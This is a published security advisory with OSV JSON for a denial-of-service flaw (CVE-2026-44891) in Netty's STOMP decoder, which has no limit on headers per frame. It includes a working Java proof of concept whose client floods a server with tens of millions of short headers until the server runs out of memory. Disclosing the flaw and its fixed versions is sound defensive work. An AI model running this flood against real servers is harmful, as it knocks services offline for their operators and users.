GHSA-VHCH-2WF3-M8RP
Vulnerability from github – Published: 2026-07-14 20:16 – Updated: 2026-07-14 20:16Summary
The StompSubframeDecoder fails to limit the total number of headers or their cumulative size per frame, allowing an attacker to cause an OutOfMemoryError, leading to a Denial of Service.
Details
io.netty.handler.codec.stomp.StompSubframeDecoder implements the STOMP protocol. The maxLineLength parameter restricts the length of individual header lines, but there is no mechanism to limit the total number of headers in a single STOMP frame. An attacker can send a large number of short headers (e.g., a: 1\n), which are accumulated in memory inside the DefaultStompHeadersSubframe until the JVM throws an OutOfMemoryError.
PoC
Run the server with -Xmx256m
public final class ServerApp {
public static void main(String[] args) throws Exception {
EventLoopGroup group = new MultiThreadIoEventLoopGroup(NioIoHandler.newFactory());
try {
ChannelFuture serverFuture = new ServerBootstrap()
.group(group)
.channel(NioServerSocketChannel.class)
.childHandler(new StompSubframeDecoder())
.bind(8080)
.sync();
serverFuture.channel().closeFuture().sync();
} finally {
group.shutdownGracefully();
}
}
}
public final class ClientApp {
public static void main(String[] args) throws Exception {
try (Socket socket = new Socket("127.0.0.1", 8080)) {
OutputStream out = socket.getOutputStream();
out.write("CONNECT\n".getBytes(StandardCharsets.UTF_8));
StringBuilder sb = new StringBuilder();
for (int i = 0; i < 1000; i++) {
sb.append("a:1\n");
}
byte[] bulkHeaders = sb.toString().getBytes(StandardCharsets.UTF_8);
for (int i = 1; i <= 50_000; i++) {
out.write(bulkHeaders);
}
} catch (Exception e) {
e.printStackTrace();
}
}
}
Impact
Denial of Service: An attacker can easily exhaust the server's memory by sending a single malicious STOMP message. Any server exposing a STOMP endpoint based on StompSubframeDecoder is vulnerable to DoS.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.2.15.Final"
},
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec-stomp"
},
"ranges": [
{
"events": [
{
"introduced": "4.2.0.Alpha1"
},
{
"fixed": "4.2.16.Final"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.1.135.Final"
},
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec-stomp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.1.136.Final"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44891"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-14T20:16:34Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nThe StompSubframeDecoder fails to limit the total number of headers or their cumulative size per frame, allowing an attacker to cause an OutOfMemoryError, leading to a Denial of Service.\n\n### Details\n`io.netty.handler.codec.stomp.StompSubframeDecoder` implements the STOMP protocol. The `maxLineLength` parameter restricts the length of individual header lines, but there is no mechanism to limit the total number of headers in a single STOMP frame. An attacker can send a large number of short headers (e.g., `a: 1\\n`), which are accumulated in memory inside the `DefaultStompHeadersSubframe` until the JVM throws an OutOfMemoryError.\n\n### PoC\nRun the server with `-Xmx256m`\n\n```java\npublic final class ServerApp {\n public static void main(String[] args) throws Exception {\n EventLoopGroup group = new MultiThreadIoEventLoopGroup(NioIoHandler.newFactory());\n try {\n ChannelFuture serverFuture = new ServerBootstrap()\n .group(group)\n .channel(NioServerSocketChannel.class)\n .childHandler(new StompSubframeDecoder())\n .bind(8080)\n .sync();\n serverFuture.channel().closeFuture().sync();\n } finally {\n group.shutdownGracefully();\n }\n }\n}\n```\n\n```java\npublic final class ClientApp {\n public static void main(String[] args) throws Exception {\n try (Socket socket = new Socket(\"127.0.0.1\", 8080)) {\n OutputStream out = socket.getOutputStream();\n\n out.write(\"CONNECT\\n\".getBytes(StandardCharsets.UTF_8));\n\n StringBuilder sb = new StringBuilder();\n for (int i = 0; i \u003c 1000; i++) {\n sb.append(\"a:1\\n\");\n }\n byte[] bulkHeaders = sb.toString().getBytes(StandardCharsets.UTF_8);\n\n for (int i = 1; i \u003c= 50_000; i++) {\n out.write(bulkHeaders);\n }\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n}\n```\n\n### Impact\nDenial of Service: An attacker can easily exhaust the server\u0027s memory by sending a single malicious STOMP message. Any server exposing a STOMP endpoint based on StompSubframeDecoder is vulnerable to DoS.",
"id": "GHSA-vhch-2wf3-m8rp",
"modified": "2026-07-14T20:16:34Z",
"published": "2026-07-14T20:16:34Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/netty/netty/security/advisories/GHSA-vhch-2wf3-m8rp"
},
{
"type": "PACKAGE",
"url": "https://github.com/netty/netty"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Netty: Denial of Service via Unbounded Headers in StompSubframeDecoder"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.